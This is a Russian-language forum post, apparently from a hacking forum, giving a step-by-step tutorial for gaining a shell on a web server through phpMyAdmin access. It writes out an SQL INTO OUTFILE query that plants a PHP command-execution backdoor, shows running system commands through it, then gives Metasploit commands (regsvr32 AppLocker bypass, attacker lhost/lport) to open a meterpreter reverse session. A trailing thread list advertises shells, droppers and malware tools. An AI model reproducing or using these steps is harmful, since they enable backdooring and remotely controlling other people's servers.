Загрузка shell в WEB-сервер. PhpMyAdmin

Forevonly

Original poster
Pro Member
Сообщения
599
Реакции
603
Посетить сайт
Приветствую! В этой статье рассмотрим способ загрузки shell на целевой веб-сервер, при условии, что у нас есть доступ к phpmyadmin панели. В качестве платформы для тестов, возьмем XAMPP, о нем я уже писал в этой

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

.
Для начала необходимо будет сгенерировать SQL запрос для выполнения вредоносного кода, а затем приложить некоторые усилия, чтобы получить полноценный доступ к удаленному хосту.
24191358b05c904442320.png

Итак, работать для начала, будем с PhpMyAdmin – это веб-приложение с открытым кодом, написанное на языке PHP и представляющее собой веб-интерфейс для администрирования СУБД MySQL. PHPMyAdmin позволяет через браузер осуществлять администрирование сервера MySQL, запускать команды SQL и просматривать содержимое таблиц и баз данных. Подробнее здесь:
>

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Заходим в панель управления phpmyadmin и создаем новую базу данных:
2f1ebf809e4d30398bdbe.png

Затем, выбрав эту базу данных, идем в поле SQL, вписываем туда представленный ниже SQL запрос и выполняем его.
> SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”
4c6cd1a9af4044cf44684.png

Теперь, попробуем обратиться к серверу по адресу 127.0.0.1/backdoor.php, если вы видите такой вывод, то уязвимость успешно создана:
12ec0546d9aa8a4c709b0.png

Так же, это значит, что через строку браузера, мы можем передавать команды в cmd скомпрометированного хоста.
> 127.0.0.1/backdoor.php?cmd=systeminfo
525d41383462a6c12e646.png

Осталось получить активную сессию meterpreter на своем хосте, для полного контроля над целевым.
Запускаем Msfconsole и используем следующий эксплоит:
> use exploit/windows/misc/regsvr32_applocker_bypass_server
> set lhost 172.16.0.192
> set lport 4444
> exploit

488a227767b5590b66f21.png

Выделенный текст, следует вписать как команду в адресную строку браузера, после cmd=
> 127.0.0.1/backdoor.php?cmd=выделенный текст
5f60d748c58dff216e480.png

Как результат, получаем активную сессию meterpreter:
ab8ac1d271264c04bb8f0.png
 
  • Like
Реакции: Task110001
Название темы
Автор Заголовок Раздел Ответы Дата
W Загрузка Диска 100% Свободное общение и флейм 1
M Проверено Загрузка вашего файла .ехе Инсталлы Трафик, загрузки, инсталлы, iframe 0
LightMan Интересно Java - Получаем SHELL через Minecraft плагин Другие ЯП 7
H Web-shell без JavaScript с файл-менеджером на борту Корзина 0
NickelBlack Jex Bot V5 | Auto Shell Bot Spam/DDOS/Malware 2
I Куплю Куплю ракушки shell for backlinks Куплю/Обменяю 0
T0pDro4eR Reverse-shell upgrade Полезные статьи 0
T0pDro4eR Ani Shell v.1.3 Spam/DDOS/Malware 1
Forevonly Заливка WEB-Shell WSO на уязвимые сайты. Для новичков )) Полезные статьи 2
Forevonly Reverse Shell через конфигурационный файл OpenVPN Полезные статьи 0
Forevonly Skipfish - Сканер безопасности веб-приложений для определения XSS, SQL инъекции, а также Shell инъекции Kali Linux 0
ins1der Огромная подборка софта для работы с SHELL Софт для работы с текстом/Другой софт 2
bay0net [SELL] TXT/MHT-Dropper + Loader :: [web-панель, C++ WinAPI, offline] Продажа софта 1
bay0net [SELL] Стартер :: подготовка системы для шифрования [web-панель, C++ WinAPI, offline] Продажа софта 0
Dharma_Service Web development | разработка сайтов/магазинов/лендингов | платежные страницы | скрипты | dns сервера Ищу работу. Предлагаю свои услуги. 1
Alexservis Привет! Разработаем: WEB проект/ Сайт/ Копию Сайта/ Скрипты| Под ключ Ищу работу. Предлагаю свои услуги. 1
C Курс: Advanced Web Attacks and Exploatation (2020) Другое 0
safecar Продам Разработка web проектов любой сложности. Услуги дизайнеров/веб-разработчиков 1
R WEB-разработчик на C# Предоставляю работу. Ищу специалиста. 0
Denik Интересно Чем Deep web отличается от Darknet Полезные статьи 3
M Топ-5 лучших Dark Web Browser для анонимного просмотра веб - страниц с максимальной конфиденциальностью Уязвимости и взлом 0
SSHMAN Hack the Web. Взламываем сайт. Используем и эксплуатируем уязвимости. Уязвимости и взлом 1
GhosTM@n Интересно InduSoft Web Studio 8.1 SP1 - "Atributos" Denial of Service (PoC) Полезные статьи 0
B [Иван Петриченко] WEB-разработчик 2020 Полезные статьи 0
andre5787 Регистрация Web money на другие паспортные данные Вопросы и интересы 0
B HTML5 и CSS3 Современные средства Web-разработки - geekbrains Полезные статьи 0
Web-Link Web-link - каталог dark тематики Полезные статьи 3
M CryptoTab Browser by OrangePie - Download the browser for the web Софт для работы с текстом/Другой софт 0
АнАлЬнАя ЧуПаКаБрА INLINE Republic.ru B/C WEB Проекты Private Keeper 0
A CTF. WEB. Задания с Root-Me, часть 19 Полезные статьи 0
A CTF. WEB. Задание с Root-Me часть 17. Полезные статьи 0
A CTF. WEB. Задания с Root-Me часть 16. Полезные статьи 0
A GTF. Задания для новичков категории WEB 6 Полезные статьи 0
A Курсы для начинающих. Задания категории WEB 13 Полезные статьи 0
A CTF. Практические задания категории WEB 15. Полезные статьи 0
U WEB-разработка 50% скидка всем Ищу работу. Предлагаю свои услуги. 0
S Услуги дизайна для web сайтов и мобильных приложений Ищу работу. Предлагаю свои услуги. 1
N Acunetix Web Vulnerability Scanner 12.0.181012141 Full Lisence New 2019 Уязвимости и взлом 0
VipRin1 Путёвка в Dark Web , часть 2 Полезные статьи 0
T0pDro4eR Wapiti - Сканер Web - приложений Полезные статьи 0
T0pDro4eR Полезные ссылки для Web разработчиков Полезные статьи 2
kdroshev MySQL 5. Проектирование и создание баз данных для web Другое 0
Forevonly Web Breaker - Динамическое тестирование Web - приложений Kali Linux 0
P Atspace - Free Web Hosting with all the perks Полезные статьи 3
Forevonly ViSQL - сканер уязвимостей целевого web-ресурса Kali Linux 1
Forevonly OnionScan - исследуй Dark Web Kali Linux 0
Forevonly XAMPP - Web-сервер Полезные статьи 0
Simbion Пасcивный заработок через proxy-web Способы заработка 215
P Web Proxies Central V2 - Undetected Yet list of proxies Другие ЯП 0
shooter Обнародованы документы ЦРУ о программе по контролю за web-камерами Новости в сети 0

Название темы